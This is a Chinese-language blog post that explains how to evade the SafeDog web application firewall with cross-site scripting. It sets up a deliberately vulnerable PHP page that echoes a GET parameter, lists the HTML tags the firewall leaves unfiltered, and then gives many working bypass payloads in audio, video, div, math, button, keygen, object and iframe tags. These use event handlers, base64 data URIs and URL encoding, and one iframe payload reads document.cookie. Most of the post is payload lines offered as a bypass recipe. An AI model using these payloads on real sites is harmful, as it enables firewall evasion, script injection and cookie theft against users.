xss绕过安全狗方法

少羽.
少羽.
少羽.
433
文章
88
评论
2019年5月30日14:20:09 评论 10,427 1469字阅读4分53秒
广告也精彩

0x00:环境

server 2003+phpstudy+安全狗apache版本v4.0+PHP代码

测试代码:

<?php

//XSS反射型漏洞

//1.变量的直接输出    

echo $_GET['XSS'];

?>

0x01:标签

先对标签进行测试。

标签:

<script>  <a>  <p>  <img>  <body> <button>  <var>  <div>  <iframe>  <object> <input> 
<textarea>  <keygen> <frameset>  <embed>  <svg>  <math>  <video>  <audio> <select>

没有过滤的标签:

<a>
<body>        
<button>    
<var>      
<iframe>     
<object>    
<keygen>      
<math>
<svg>

0x02:绕过方法

可以弹窗的:alert,prompt ,confirm,base64加密,编码绕过(安全狗都没有过滤)

绕过方法有很多比如:

1.大小写绕过

2.javascript伪协议

3.没有分号

4.Flash

5.HTML5 新标签

6.Fuzz进行测试

7.双层标签绕过

audio标签:

<audio src=x onerror=alert(47)>
<audio src=x onerror=prompt(1);>
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>

xss绕过安全狗方法

video标签:

<video src=x onerror=prompt(1);>
<video src=x onerror=alert(48)>

xss绕过安全狗方法

标签:div

<div style="width:expression(alert(/1/))">1</div>     ie浏览器执行
<div onmouseover%3d'alert%26lpar%3b1%26rpar%3b'>DIV<%2fdiv>   url编码绕过

xss绕过安全狗方法xss绕过安全狗方法

math标签:

<math><a/xlink:href=javascript:prompt(1)>Xss

<math href="javascript:javascript:alert(1)">Xss</math>

xss绕过安全狗方法

button标签:

<button onfocus=alert(1) autofocus>
<button/onclick=alert(1) >xss</button>

xss绕过安全狗方法

keygen标签:

<keygen/onfocus=prompt(1);>
<keygen onfocus=javascript:alert(1) autofocus>

xss绕过安全狗方法

object标签:

<object data="data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg=="></object>

base64加密:PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg    
      解码:<script>alert(1)</script>

xss绕过安全狗方法

iframe标签:

<IFRAME width%3d"420" height%3d"315" frameborder%3d"0" onload%3d"alert(document.cookie)"><%2fIFRAME>
<iframe%2fsrc%3d"data%3atext%2fhtml%3b%26Tab%3bbase64%26Tab%3b,PGJvZHkgb25sb2FkPWFsZXJ0KDEpPg%3d%3d">
<iframe srcdoc%3d'%26lt%3bbody onload%3dprompt%26lpar%3b1%26rpar%3b%26gt%3b'>

xss绕过安全狗方法

继续阅读
  • 我的微信
  • 微信扫一扫
  • weinxin
  • 我的微信公众号
  • 微信扫一扫
  • weinxin
广告也精彩
少羽.
  • 本文由 发表于 2019年5月30日14:20:09
  • 除非特殊声明,本站文章均为原创,转载请务必保留本文链接
惊!百度被黑?百度被XSS攻击简单溯源! 技术园

惊!百度被黑?百度被XSS攻击简单溯源!

昨天又忙的忘记写这篇重要的文章了,今天补上哈哈! 我觉得你们都习惯我这样了,没办法真的太懒了!好了回归正题。 正文 原作者:Eugene 晚上在圈子也是被百度的xss刷屏了,用手机百度搜索script...
emlog程序xss漏洞后台拿shell以及修复方法 技术园

emlog程序xss漏洞后台拿shell以及修复方法

目前 很多Emlog的模板都已经修复了这个XSS漏洞 一小部分还没修复 所以 今天就利用这个漏洞原理 来拿下一个博客站的后台! 教程开始 首先 检查一下有没有开放注册 如果开放注册的话 就先注册一个账...
网站渗透攻防Web篇之SQL注入攻击高级篇 技术园

网站渗透攻防Web篇之SQL注入攻击高级篇

前言 前面我们学习了如何寻找,确认,利用SQL注入漏洞的技术,本篇文章我将介绍一些更高级的技术,避开过滤,绕开防御。有攻必有防,当然还要来探讨一下SQL注入防御技巧。 网站渗透攻防Web篇之SQL注入...
广告也精彩
匿名

发表评论

匿名网友 填写信息

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: